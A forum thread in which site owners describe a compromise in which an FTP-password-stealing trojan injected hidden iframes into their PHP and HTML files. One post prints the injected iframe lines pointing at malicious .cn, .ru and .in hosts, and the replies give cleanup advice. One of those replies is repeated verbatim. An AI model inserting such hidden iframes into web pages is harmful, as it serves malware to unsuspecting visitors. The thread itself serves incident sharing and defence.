lol hacked....freakin wp....hacked!!!

Code:
Just an FYI. It's not just Wordpress that is being exploited. I had the same issue on a non WordPress Site that got hacked.... Here was what i found in several of my files:

<iframe src="hxxp://cubanbigtop.cn:8080/index.ph
<iframe src="hxxp://c6y.ru:8080/index.p
<iframe src="hxxp://u3j.ru:8080/index.
<iframe src="hxxp://u5m.ru:8080/index
<iframe src="hxxp://q0j.ru:8080/inde
<iframe src="hxxp://u0b.in:8080/ts/in.cgi?pe
<iframe src="hxxp://x8b.in:8080/in
<iframe src="hxxp://x9m.in:8080/index.php" width=155 height=152 style="visibility: hidden"></iframe>

Yes, it is true. My YACG sites are also infected with the same shit.
 
Same shit happened to me. Trojan on my pc, logged into ftp account @ hosting provider..went through ALL my sites and inserted shit into the .php files. Same happened to you now. Your blogs were not hacked, but the ftp account passwords stolen.

Am going to nuke it like bluerickshaw suggested to me too just to be sure.

Yep exactly, FTP sniffing trojan. You can remove them if you know what you're doing, but if you don't it may be safer/easier to wipe the PC and do a fresh install "then" go change all your logins.

I remember about a week ago, someone posted in the DL section their BHW account was hacked and someone posted a download with 4 programs/exes with it. If i remember right it was some "Warrior Tools", did anyone download that?
 
Hei, i also have the same problem before some weeks, so there is full explanation about this hack at DP, so in few words, hacker has program in his (or her :) ) computer which found leaks in FTP's after that the software is inserting code with Iframes in all your files on ffp named index.html or .php or whatever. So the solutions is:

First: change all your passwords, root ftp... ( recommended from third party PC not from yours)
Second: :D format your PC or clean it up, its almost sure you have some viruses there. ( I know from experince, reinstalled windows 3 times for 1 week).
Third: clear all files in FTP from iframes.

...and everything is fine :) till next time
 
Hei, i also have the same problem before some weeks, so there is full explanation about this hack at DP, so in few words, hacker has program in his (or her :) ) computer which found leaks in FTP's after that the software is inserting code with Iframes in all your files on ffp named index.html or .php or whatever. So the solutions is:

First: change all your passwords, root ftp... ( recommended from third party PC not from yours)
Second: :D format your PC or clean it up, its almost sure you have some viruses there. ( I know from experince, reinstalled windows 3 times for 1 week).
Third: clear all files in FTP from iframes.

...and everything is fine :) till next time

I also faced the same problem , it wasted a lot of time because it was a reoccurring one and i didnt have a clue about it , applied the same solution which you posted , worked for me.
 
Is it good to stay away from a FTP client plugin for your Browser?

i.e. FireFTP for FF

.
 
i say if you are using filezilla, hackers can easily log all your stored password, so better make it a secure connection or just do quick connect and than removed all your private data after file transfer, and incase you have been compromised, better check all your server files or this hacker will leeched, squeeze your hosting bandwidth plus they might leave some php files to run it again ( another sort of attack) so be sure to check each and every folder of your hosting if you think you are being compromised.

do not leave any unknown files on your server
hope this help
 
Back
Top